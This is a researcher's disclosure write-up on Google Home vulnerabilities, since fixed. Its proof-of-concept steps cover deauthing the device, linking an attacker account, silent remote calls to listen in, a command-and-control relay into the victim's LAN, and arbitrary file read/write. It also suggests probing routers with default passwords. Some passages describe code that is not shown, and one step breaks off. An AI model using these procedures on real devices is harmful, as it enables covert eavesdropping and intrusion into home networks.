- Install the requirements: pip3 install requests==2.23.0 gpsoauth httpx[http2]

- Create the "attacker" Google account

- Log in with python3 google_login.py

- Get within wireless proximity of Google Home

- Deauth the Google Home

  - Raw packet injection (required for deauth attacks) requires a rooted phone and won't work on some Wi-Fi chips. I ended up using a NodeMCU, a tiny Wi-Fi development board, going for less than $5 on Amazon, and flashed it with spacehuhn's deauther firmware. You can use its web UI to scan for nearby devices and deauth them. It quickly found my Google Home (manufacturer listed as "Google" based on MAC address prefix) and I was able to deauth it.

- Connect to the Google Home's setup network (named [device name].o)

- Run python3 link_device.py --setup_mode 192.168.255.249 to link your account to the device

  - In addition to linking your account, to make the attack as stealthy as possible, "night mode" is also enabled on the device, which decreases the maximum volume and LED brightness. Since music volume is unaffected, and the volume decrease is almost entirely suppressed when the volume is greater than 50%, this subtle change is unlikely to be noticed by the victim. However, it makes it so that, at 0% volume, the Assistant voice is completely muted (whereas with night mode off, it can barely still be heard at 0%).

- Stop the deauth attack and wait for the device to re-connect to the Internet

  - You can run python3 reset_volume.py 4 to reset the volume to 40% (since enabling night mode set it to 0%).

- Now that your account is linked, you can make the device call your phone number, silently, at any time, over the Internet, allowing you to listen in to the microphone feed.

  - To issue a call, run python3 call_device.py [phone number].

  - The commands "set the volume to 0" and "call [number]" are executed on the device remotely using a routine.

- The only thing the victim may notice is that the device's LEDs turn solid blue, but they'd probably just assume it's updating the firmware or something. In fact, the official support page describing what the LED colors mean only says solid blue means "Your speaker needs to be verified by you" and makes no mention of calling. During a call, the LEDs do not pulse like they normally do when the device is listening, so there is no indication that the microphone is open.

- To issue a call, run

Here's a video demonstrating what it looks like when a call is initiated remotely:

As you can see, there is no audible indication that the commands are running, which makes it difficult for the victim to notice. The victim can still use their device normally for the most part (although certain commands, like music playback, don't work during a call).

PoC #2: Make arbitrary HTTP requests on victim's network

As I described earlier, the attacker can install a smart home action onto the linked device remotely, and leverage the Local Home SDK to make arbitrary HTTP requests within the victim's LAN. c2.py is the command & control server. app.js and index.html are the local home app.

- Configure and start the C&C server:

  - Install the requirements: pip3 install mitmproxy websockets

  - Start the server: mitmdump --listen-port 8000 --set upstream_cert=false --ssl-insecure -s c2.py

    - Under the default configuration, a proxy server starts on localhost:8000, and a WebSocket server starts on 0.0.0.0:9000. The proxy server acts as a relay, sending requests from programs on your computer (like curl) to the victim's Google Home through the WebSocket. In a real attack, the WebSocket port would need to be exposed to the Internet so the victim's Google Home could connect to it, but for local demonstration, it doesn't have to be.

- Configure the local home app:

  - Change the C2_WS_URL variable at the top of app.js to the WebSocket URL for your C&C server. This needs to be reachable by the Google Home.

  - Host the static index.html and app.js files somewhere reachable by the Google Home. For local demonstration, you can spin up a simple file hosting server using python3 -m http.server.

- Deploy the local home app to your account:

  - Follow these instructions to create a sample app on your account.

  - Add a fake device:

    npm run firebase --prefix functions/ -- functions:config:set strand1.leds=16 strand1.channel=1 strand1.control_protocol=HTTP

    npm run deploy --prefix functions/

    - This tells the cloud fulfillment to include an otherDeviceIds field in responses to SYNC requests. As far as I understand, this is all that's required to activate local fulfillment; the specific device IDs or attributes you choose don't matter.

  - From the Actions Console, go to Develop -> Actions -> Configure local home SDK, and set the "testing URL for Chrome" to the URL of index.html. For local demonstration, this can be a private IP, but it must be reachable by the Google Home.

  - Add the following mDNS scan configurations:

    - MDNS service name: _googlecast._tcp.local

    - MDNS service name: _googlezone._tcp.local

    - MDNS service name: _googlerpc._tcp.local

  - Open Google Assistant settings on your phone, and select "Home Control", then the "+" sign. Select the app with the [test] prefix to link it.

- Get within wireless proximity of the victim's Google Home, then force it into setup mode, and link your account using the link_device.py script from PoC #1.

- Reboot the device:

  - While still connected to the device's setup network, send a POST request to the /reboot endpoint with the body {"params":"now"} and a cast-local-authorization-token header (obtained with HomeGraphAPI.get_local_auth_tokens() from googleapi.py).

  - For local demonstration, you can just unplug the Google Home then plug it back in.

- Not long after the reboot, the Google Home automatically downloads your local home app and runs it.

  - The app waits for the IDENTIFY request it receives when the Google Home finds itself through mDNS scanning, then connects to the Chrome DevTools Protocol WebSocket on port 9222. After connecting to CDP, it opens a WebSocket to your C&C server, and waits for commands. If disconnected from either CDP or the C&C server, it automatically tries to reconnect every 5 seconds.

  - Once loaded, it seems to run indefinitely. The documentation says apps may be killed if they consume too much memory, but I haven't run into this, and I've even left my app running overnight. If the Google Home is rebooted, the app will reload.
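The reboot step in the list above can be sketched as follows. This only builds the request and does not send it. The port (8443) is taken from the other local API examples in this article; the `/setup/` prefix on the `/reboot` path is an assumption based on the other endpoints shown, and the function name and token value are hypothetical.

```python
import json
import urllib.request

LOCAL_API_PORT = 8443  # HTTPS port used by the article's other local API examples


def build_reboot_request(device_ip: str, token: str) -> urllib.request.Request:
    """Build (but do not send) a POST that asks the device to reboot now."""
    body = json.dumps({"params": "now"}).encode()
    return urllib.request.Request(
        # Assumption: the reboot endpoint lives under /setup/ like the others.
        url=f"https://{device_ip}:{LOCAL_API_PORT}/setup/reboot",
        data=body,
        method="POST",
        headers={
            "cast-local-authorization-token": token,
            "Content-Type": "application/json",
        },
    )


# 192.168.255.249 is the setup-network address used with link_device.py above.
req = build_reboot_request("192.168.255.249", "TOKEN-PLACEHOLDER")
print(req.get_method(), req.full_url)
```

Actually sending it would additionally need TLS certificate verification to be relaxed, in the same way the curl examples in this article pass --insecure.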

Now, you can send HTTP(S) requests on the victim's private LAN, as if you had the WiFi password, even though you don't (yet), by configuring a program on your computer to route its traffic through the local proxy server, which in turn routes it to the Google Home. For example, curl --proxy 'localhost:8000' --insecure -v https://localhost:8443/setup/eureka_info returns the Google Home's info, because through the proxy, localhost resolves to the Google Home's IP. The JSON response to /setup/eureka_info contains the IP, which is helpful for determining the layout of the LAN.

I was even able to route Chrome through the proxy, with chrome --proxy-server='localhost:8000' --ignore-certificate-errors --user-data-dir='SOME_DIR', and it worked surprisingly well.

Obviously, the ability to send requests on the private LAN opens a large attack surface. Using the IP of the Google Home, you can determine the subnet that the victim's other devices are on. For example, my Google Home's IP is 192.168.86.132, so I could guess that my other devices are in the 192.168.86.0 to 192.168.86.255 range. You could write a simple script to curl every possible address, looking for devices on the LAN to attack or steal data from. Since it only takes a few seconds to check each IP, it would only take around 10 minutes to try every one. On my LAN, I found my printer's web interface at http://192.168.86.33. Its network settings page contains an <input type="password"> pre-filled with my WiFi password in plaintext. It also provides a firmware update mechanism, which I imagine could be vulnerable to attack.
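A minimal sketch of the address enumeration described above, assuming the LAN is a /24 (which is what the 192.168.86.0 to 192.168.86.255 range implies). The 2.5 seconds per host is an assumed stand-in for "a few seconds", and the function name is hypothetical. Probing each address through the proxy is left out.

```python
import ipaddress


def candidate_hosts(device_ip: str, prefix_len: int = 24) -> list:
    """List the other usable addresses on the device's subnet."""
    network = ipaddress.ip_network(f"{device_ip}/{prefix_len}", strict=False)
    # hosts() skips the network and broadcast addresses; also skip the device itself.
    return [str(host) for host in network.hosts() if str(host) != device_ip]


hosts = candidate_hosts("192.168.86.132")

SECONDS_PER_HOST = 2.5  # assumption, not a measured value
estimated_minutes = len(hosts) * SECONDS_PER_HOST / 60
print(f"{len(hosts)} addresses to try, roughly {estimated_minutes:.0f} minutes")
```

Each address in `hosts` would then be requested through the local proxy, for instance with the same curl --proxy invocation shown earlier.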

Another approach would be looking for the victim's router and trying to attack that. My router's IP, 192.168.1.254, shows up among the first results when you Google "default router IPs". You could write a script to try these. My router's configuration interface also immediately returns my WiFi password in plaintext. Luckily, I've changed the default admin password, so at the very least an attacker with access to it wouldn't be able to modify the settings, but most people don't change this password, so you could find it by searching for "[brand name] router password", then set the DNS server to your own, install malicious firmware updates, etc. Even if the victim changed their router's password, it may still be vulnerable. For example, in June 2020, a researcher found a buffer overflow vulnerability in the web interface on 79 Netgear router models that led to a root shell, and described the process as "easy".

PoC #3: Read/write arbitrary files on device

I also found a way to read/write arbitrary files on the linked device using the DOM.setFileInputFiles and Page.setDownloadBehavior methods of the Chrome DevTools Protocol.

The following reproduction steps first write a file, /tmp/example_file.txt, then read it back to verify that it worked.

- Enable remote debugging on the Google Home:

  - Follow these instructions using a Google account linked to the device.

- Install the requirements:

  npm install ws

  pip install flask

- Create an example_file.txt, e.g. echo 'test' > example_file.txt

- Run python3 write_server.py example_file.txt. You can optionally modify the HOST or PORT variables at the top of the script. Get the URL of the server, like http://[IP]:[port]. This must be reachable by the Google Home.

- Run node write.js [Google Home IP] [write server URL] /tmp, inserting the appropriate values. You can get the Google Home's IP from the Google Home app. The file will be written to /tmp/example_file.txt.

- Run python3 read_server.py. You can modify the host/port like before.

- Run node read.js [Google Home IP] [read server URL]. When prompted for a file path to read, enter /tmp/example_file.txt.

- Verify that example_file.txt was dumped from the device to dumped_files/example_file.txt
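For reference, here is a rough sketch of what the two CDP commands named above look like on the wire. The method names and parameter names come from the Chrome DevTools Protocol; how write.js and read.js actually use them is not shown in this article, so the pairing below (downloads for writing, a file input for reading) is an assumption, and the helper name and `nodeId` value are placeholders.

```python
import itertools
import json

_next_id = itertools.count(1)


def cdp_message(method: str, **params) -> str:
    """Serialize one CDP command; each command carries its own integer id."""
    return json.dumps({"id": next(_next_id), "method": method, "params": params})


# Write direction (assumed): let downloads land in a directory of our choosing.
allow_downloads = cdp_message(
    "Page.setDownloadBehavior", behavior="allow", downloadPath="/tmp"
)

# Read direction (assumed): attach a file on the device to a file input element.
# nodeId=1 is a placeholder; a real ID would come from a DOM query.
attach_file = cdp_message(
    "DOM.setFileInputFiles", files=["/tmp/example_file.txt"], nodeId=1
)

print(allow_downloads)
print(attach_file)
```

Each string would be sent as a text frame over the CDP WebSocket connection.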

Since I couldn't explore the filesystem of my Google Home (and <input type="file" webkitdirectory> didn't work to upload folders instead of files), I'm not sure exactly what the impact of this was. I was able to find some info about the filesystem structure from the "open source licenses" info, and from the DEFCON talk on the Google Home. I dumped a few binaries like /system/chrome/cast_shell and /system/chrome/lib/libassistant.so, then ran strings on them, looking for interesting files to steal or tamper with. It looks like /data/chrome/chirp/assistant/cookie may contain user info? /data/chrome/chirp/assistant/settings and /data/chrome/chirp/assistant/phenotype_package_store both contain the GAIA IDs of the accounts linked to my Google Home. I was able to dump /data/chrome/chirp/assistant/nightmode/nightmode_params, hex edit it, and overwrite the original with my modified version, and the changes were applied after a reboot. If, for example, a bug in a config file parser was found, I imagine that this could have potentially led to RCE?

The fixes

I'm aware of the following fixes deployed by Google:

- You must request an invite to the "Home" that the device is registered to in order to link your account to it through the /deviceuserlinksbatch API. If you're not added to the Home but you try to link your account this way, you'll get a PERMISSION_DENIED error.

- "Call [phone number]" commands can't be initiated remotely through routines.

You can still deauth the Google Home and access its device info through the /setup/eureka_info endpoint, but you can't use it to link your account anymore, and you can't access the rest of the local API (because you can't get a local auth token).

On devices with a display (e.g. Google Nest Hub), the setup network is protected with a WPA2 password which appears as a QR code on the display (scanned with the Google Home app), which adds an additional layer of protection.

Additionally, on these devices, you can say "add my voice" to bring up a screen with a link code instructing you to visit https://g.co/nest/voice. You can link your account to the device through this website, even if you aren't added to its Home (which is fine, because this still requires physical access to the device). The "add my voice" command doesn't appear to work on the Google Home Mini, probably since it doesn't have a display that it can use to provide a link code. I guess if Google wanted to implement this, they could make it speak the link code out loud or text it to a provided phone number or something.

Reflections/conclusions

Google Home's architecture is based on Chromecast. Chromecast doesn't place much emphasis on security against proximity-based attacks because it's mostly unnecessary. What's the worst that could happen if someone hacks your Chromecast? Maybe they could play obscene videos? However, the Google Home is a much more security-critical device, due to the fact that it has control over your other smart home devices, and a microphone. If the Google Home architecture had been built from scratch, I imagine that these issues would have never existed.

After the first Google Home device was released in November 2016, Google kept adding features to the device's cloud APIs, like scheduled routines (July 2018) and the Local Home SDK (April 2020). I'm guessing that the engineers behind these features were under the assumption that the account linking process was secure.

Many other security researchers had already given the Google Home a look before me, but somehow it appears that none of them noticed these seemingly glaring issues. I guess they were mainly focused on the endpoints that the local API exposed and what an attacker could do with those. However, these endpoints only allow for adjusting a few basic device settings, and not much else. While the issues I discovered may seem obvious in hindsight, I think that they were actually pretty subtle. Rather than making a local API request to control the device, you instead make a local API request to retrieve innocuous-looking device info, and use that info along with cloud APIs to control the device.

As the DEFCON talk shows, the low-level security of the device is generally pretty good, and buffer overflows and such are hard to come by. The issues I found were lurking at the high level.

Many thanks to Google for the incredibly generous rewards!

Disclosure timeline

- 01/08/2021: Reported

- 01/10/2021: Triaged

- 01/20/2021: Closed (Intended Behavior)

  - I was busy with school stuff, so it took me a while to respond

- 03/11/2021: Sent additional details and PoC

- 03/19/2021: Reopened

- 04/07/2021: Sent additional details

- 04/20/2021: Reward received

- 04/05/2022: Google announced increased rewards for Google Nest and Fitbit devices

- 05/04/2022: Bonus rewards received

Prior research

Here are some articles I found during my research on Google Home devices that I thought were interesting:

- July 2014: "RickMote" Chromecast hijacking

- August 2014: Chromecast secure boot bypass (requires physical access)

- January 2018: Unofficial documentation of Google Home local API

- June 2018: DNS rebinding attack allows any website to access local API

- October 2018: 'No evidence user information at risk' says Google regarding Home Hub security

- January 2019: CastHack

- June 2019: Local API now requires an auth token

- August 2019: DEFCON talk on Google Home

- November 2019: "Light Commands" attack

- July 2020: Google Home Mini secure boot bypass (requires physical access)

Footnote: Static analysis of Google Home app

During my research, I did a little digging within the Google Home app. I didn't find any security issues here, but I did discover some things about the local API that the unofficial docs don't yet include.

show_led endpoint





To find a list of local API endpoints (and potentially some undocumented ones), I searched for a known endpoint (get_app_device_id) in the decompiled sources:



The information I was looking for was in defpackage/ufo.java:



SHOW_LED sounded interesting, and it wasn't in the unofficial docs. Searching for where this constant is used led me to StereoPairCreationActivity:

With the help of JADX's amazing "rename symbol" feature, and after renaming some methods, I was able to find the class responsible for constructing the JSON payload for this endpoint:

Looks like the payload consists of an integer animation_id. We can use the endpoint like so:

$ curl --insecure -X POST -H 'cast-local-authorization-token: [token]' -H 'Content-Type: application/json' -d '{"animation_id":2}' https://[Google Home IP]:8443/setup/assistant/show_led

This makes the LEDs play a slow pulsing animation. Unfortunately it seems that there are only two animations: 1 (reset LEDs to normal) and 2 (continuous pulsing). Oh, well.

Wi-Fi password encryption



I was also able to find the algorithm used to encrypt the user's Wi-Fi password before sending it through the /setup/connect_wifi endpoint. Now that HTTPS is used, this encryption seems redundant, but I imagine that this was originally implemented to protect against MITM attacks exposing the Wi-Fi password. Anyway, we see that the password is encrypted using RSA PKCS1 and the device's public key (from /setup/eureka_info).
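To make the scheme concrete, here is a minimal pure-Python sketch of RSA encryption with PKCS#1 v1.5 padding. It assumes that "RSA PKCS1" refers to the v1.5 encryption padding, and it takes the public key as a bare modulus and exponent; decoding the key returned by /setup/eureka_info is not covered. The function names and the toy key are made up for illustration, and real code should rely on a vetted crypto library instead.

```python
import secrets


def pkcs1_v15_pad(message: bytes, k: int) -> bytes:
    """Build the k-byte block 0x00 0x02 <nonzero random bytes> 0x00 <message>."""
    if len(message) > k - 11:
        raise ValueError("message too long for this key size")
    padding = bytes(secrets.randbelow(255) + 1 for _ in range(k - len(message) - 3))
    return b"\x00\x02" + padding + b"\x00" + message


def rsa_pkcs1_encrypt(message: bytes, n: int, e: int) -> bytes:
    """Encrypt under the public key (n, e); the result is as long as the modulus."""
    k = (n.bit_length() + 7) // 8
    block = int.from_bytes(pkcs1_v15_pad(message, k), "big")
    return pow(block, e, n).to_bytes(k, "big")


# Toy key built from two Mersenne primes: for demonstration only, far too small to be secure.
n, e = (2**127 - 1) * (2**89 - 1), 65537
ciphertext = rsa_pkcs1_encrypt(b"hunter2", n, e)
print(ciphertext.hex())
```

Because the padding bytes are random, encrypting the same password twice gives different ciphertexts.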

Footnote: Deauth attacks on Google Home Mini

I mentioned above that the Google Home Mini supports neither WPA3 nor 802.11w. I'd like to clarify how I discovered this.

Since my router doesn't support these, I borrowed a friend's router running OpenWrt, a FOSS operating system for routers, which does support 802.11w and WPA3.

There are three 802.11w modes you can choose from: disabled (default), optional, and required. ("Optional" means that it's used only for devices that support it.) While I was using "required", my Google Home Mini was unable to connect, whereas my Pixel 5 (Android 12) and MacBook Pro (macOS 12.4) had no issues. I got the same results when I enabled WPA3. I tried "optional" and the Google Home Mini connected, but was still vulnerable to deauth attacks (as expected).

I tested this on the latest Google Home Mini firmware at the time of writing (1.56.309385, August 2022), on 1st gen (codename mushroom) hardware. I'm assuming this is a limitation of the Wi-Fi chip that it uses, rather than a software issue.